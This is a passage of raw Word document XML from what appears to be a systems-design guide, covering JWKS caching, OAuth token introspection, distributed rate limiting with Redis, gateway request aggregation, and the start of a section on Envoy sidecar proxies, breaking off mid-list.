    <w:p w14:paraId="182718F6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The JWKS caching strategy:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> The gateway caches the JWKS document locally with the TTL from the HTTP Cache-Control header. On cache miss (or cache expiry), it re-fetches from the identity provider. If the identity provider is temporarily unavailable — should the gateway allow requests (availability) or reject them (security)? The right answer depends on the application: for security-critical APIs (banking, admin), reject. For non-critical APIs (content delivery), serve from stale cache with a grace period.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF55894" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OAuth 2.0 token introspection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1553FCFC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>For opaque tokens (not JWTs — the token is a random string, not self-describing), the gateway calls the authorization server's introspection endpoint for every request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521D1382" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40823266" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>POST /oauth/introspect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD45A87" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>token=&lt;opaque_token&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A1E754" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6"/>
    <w:p w14:paraId="7C3445C6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Response: {"active": true, "sub": "user123", "scope": "read:orders"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C65A8F9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>This is </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>expensive</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — one additional HTTP call per request. Mitigation: cache introspection results for the token's lifetime (using the exp from the response). Risk: revoked tokens remain valid until cache expires. The caching TTL is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>revocation lag</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — the window during which a revoked token still works.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631055F6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rate Limiting at the API Gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BEA1CD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The API gateway is the natural place for rate limiting — it sees all traffic, can identify clients via authentication, and can enforce limits before requests hit the backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2051EA60" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rate limiting dimensions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0199217F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="552"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Per client IP:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Coarse-grained. Clients behind NAT share an IP — unfair.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA6B696" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="552"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Per API key / user ID:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Fine-grained. Requires authentication before rate limiting. Most common for production APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B79434" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="552"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Per tenant (multi-tenant SaaS):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Isolate tenant resource consumption. Tenant A's traffic spikes don't affect Tenant B.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BD498F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="552"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Per endpoint:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Different limits for expensive endpoints (search: 100/min) vs cheap endpoints (user profile: 1000/min).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BBD567" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="552"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Global:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Total traffic cap regardless of per-client limits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F6C42F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The distributed rate limiting problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D10AE7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Multiple API gateway instances, shared client requests. Each instance maintains its own counters → total allowed = instances × per-instance limit → effective rate limit is N times too high.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9C12DE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Centralized Redis rate limiting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8C850C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>All gateway instances share rate limit state in Redis. Each request atomically increments the counter and checks the limit. Lua scripts ensure atomicity (read-increment-check as one atomic operation). Redis's single-threaded command execution guarantees no race conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD8F240" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Redis availability concern:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> If Redis is unavailable, rate limiting fails. Two failure modes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD279BC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="553"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fail open:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Allow all requests when Redis is down (availability over security). Appropriate for non-security-critical limits (DDoS protection might fail, but service stays up).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2194FE23" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="553"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fail closed:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Reject all requests when Redis is down (security over availability). Appropriate for security-critical limits (billing limits, abuse prevention).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE63A36" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Local rate limiting with synchronization (approximate global rate limiting):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A541DFA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Each gateway instance maintains a local counter. Periodically (every 100ms), instances synchronize with Redis — pushing their local increment and pulling the global total. Each instance allows requests up to (global_limit / N) × 1.1 locally (small overage buffer). This reduces Redis dependency to once per 100ms instead of once per request — much more resilient to Redis performance issues. The trade-off: up to 100ms × global_limit/second = brief overage during synchronization gaps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080F0379" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Request Aggregation (Backend for Frontend Pattern)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4304F1FA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">A mobile client needing data from 3 microservices (user profile, order history, recommendations) would traditionally make 3 sequential or parallel HTTP calls. Each call </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>adds: DNS lookup, TCP connection, TLS handshake, request/response round-trip — potentially 300ms+ per call on mobile networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC3E66D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>API gateway aggregates</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> these calls:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096BBEF0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="554"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Client sends one request to the gateway: GET /mobile/dashboard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0588C0C7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="554"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Gateway fans out to 3 backend services simultaneously:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A583F9F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="554"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>GET /users/123 → User Service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568DB2D8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="554"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>GET /orders?user=123 → Order Service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1512DA85" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="554"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>GET /recommendations?user=123 → Recommendation Service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F55CFD3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="554"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Gateway awaits all three responses (with timeouts and fallbacks).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A128B45" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="554"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Gateway merges the responses into one combined payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6475CA0E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="554"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Returns to client in one response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D55BD2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Client pays one round-trip instead of three. For mobile clients with high latency and limited connections, this is a significant improvement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35304DDF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The aggregation reliability problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> If any one backend service fails:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192841E6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="555"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fail whole request:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Simple. But a recommendation service failure breaks the entire dashboard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3874DEE2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="555"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Partial response with defaults:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Return what's available, substitute defaults or cached data for failed services. The gateway must define fallback values per service (recommendations: [] on failure). This requires the gateway to understand the semantics of each response — tight coupling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76976521" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="555"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Timeout budget:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Each parallel call has the same timeout (e.g., 500ms). If any call exceeds it, use whatever is cached or return the partial response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290FABCF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="43C111E4">
          <v:rect id="_x0000_i3058" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="593EF1C0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Service Mesh Proxy — The Sidecar Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECD2C83" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why Sidecar Proxies Exist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00318EA9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Traditional proxies are centralized — all traffic flows through a shared proxy. In microservices environments with hundreds of services, the centralized proxy becomes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083AA08C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="556"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>A </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bottleneck</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (all inter-service traffic through one proxy cluster).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2DC259" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="556"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>A </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>single point of failure</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (proxy failure = all inter-service communication fails).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1285ADFC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="556"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>A </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>visibility chokepoint</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (all services' traffic is mixed, hard to attribute).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D70690D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sidecar proxy pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> distributes the proxy — each service instance gets its own </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dedicated proxy process running alongside it</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>. The sidecar handles all network traffic for its companion service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7ADCA8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Envoy Proxy Internals — The Industry Standard Sidecar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206FF712" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Envoy is the dominant sidecar proxy (used by Istio, AWS App Mesh, Consul Connect). Its internal architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02661F72" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Listener → Filter Chain → Cluster → Endpoint:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D10AD8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="557"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Listener:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> A socket the proxy listens on (e.g., port 15001 for outbound traffic). Accepts incoming connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4899BD50" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="557"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Filter chain:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> A sequence of </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>network filters</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP filters</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> applied to traffic on this listener.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D00836C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="557"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cluster:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> A group of upstream endpoints (backend instances for a specific service).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BEAC83" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="557"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Endpoint:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> A specific backend instance (IP:port).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58ECF51B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The filter architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1583ECA5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Filters are composable processing units. Traffic flows through a chain of filters, each performing a specific function:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011A35A2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Network filters (L4):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65884A76" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="558"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
